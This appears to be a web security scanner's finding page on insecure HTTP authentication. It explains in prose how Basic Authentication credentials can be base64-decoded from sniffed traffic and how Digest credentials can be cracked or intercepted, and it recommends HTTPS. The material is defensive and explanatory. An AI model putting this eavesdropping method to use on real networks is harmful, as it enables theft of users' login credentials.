Authentication Credentials Captured
- Risk:
Medium
- Type:
- Passive
- CWE:
- CWE-287
- Summary
An insecure authentication mechanism is in use. This allows an attacker on the network access to the userid and password of the authenticated user. For Basic Authentication, the attacker must merely monitor the network traffic until a Basic Authentication request is received, and then base64 decode the username and password. For Digest Authentication, the attacker has access to the username, and possibly also the password, if the hash (including a nonce) can be successfully cracked, or if a Man-In-The-Middle attack is mounted.
The attacker eavesdrops on the network until an authentication has completed.
- Solution
Use HTTPS, and use a secure authentication mechanism that does not transmit the userid or password in an un-encrypted fashion. In particular, avoid use of the Basic Authentication mechanism, since this trivial obfuscation mechanism is easily broken.
- Other info
- [POST] [http://www.example.com] uses insecure authentication mechanism [Digest], revealing username [admin] and additional information [username="admin", realm="members only"].
Urgent: Cisco ASA Zero-Day Duo Under Attack; CISA Triggers Emergency Mitigation Directive
Fake Microsoft Teams installers push Oyster malware via malvertising
EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations
UNC1549 Hacks 34 Devices in 11 Telecom Firms via LinkedIn Job Lures and MINIBIKE Malware
Windows 11 KB5065789 update released with 41 changes and fixes
Microsoft now enforces MFA on Azure Portal sign-ins for all tenants
Fake Madgicx Plus and SocialMetrics Extensions Are Hijacking Meta Business Accounts
Threatsday Bulletin: Rootkit Patch, Federal Breach, OnePlus SMS Leak, TikTok Scandal & More
Microsoft will offer free Windows 10 extended security updates in Europe
CVE-2025-4008 Smartbedded Meteobridge Command Injection Vulnerability
CVE-2025-21043 Samsung Mobile Devices Out-of-Bounds Write Vulnerability
CVE-2015-7755 Juniper ScreenOS Improper Authentication Vulnerability
CVE-2017-1000353 Jenkins Remote Code Execution Vulnerability
CVE-2021-21311 Adminer Server-Side Request Forgery Vulnerability
CVE-2025-10035 Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability
CVE-2025-59689 Libraesva Email Security Gateway Command Injection Vulnerability
CVE-2025-32463 Sudo Inclusion of Functionality from Untrusted Control Sphere Vulnerability
InformationalInformation Disclosure - Suspicious Comments
InformationalRe-examine Cache-control Directives
Free online web security scanner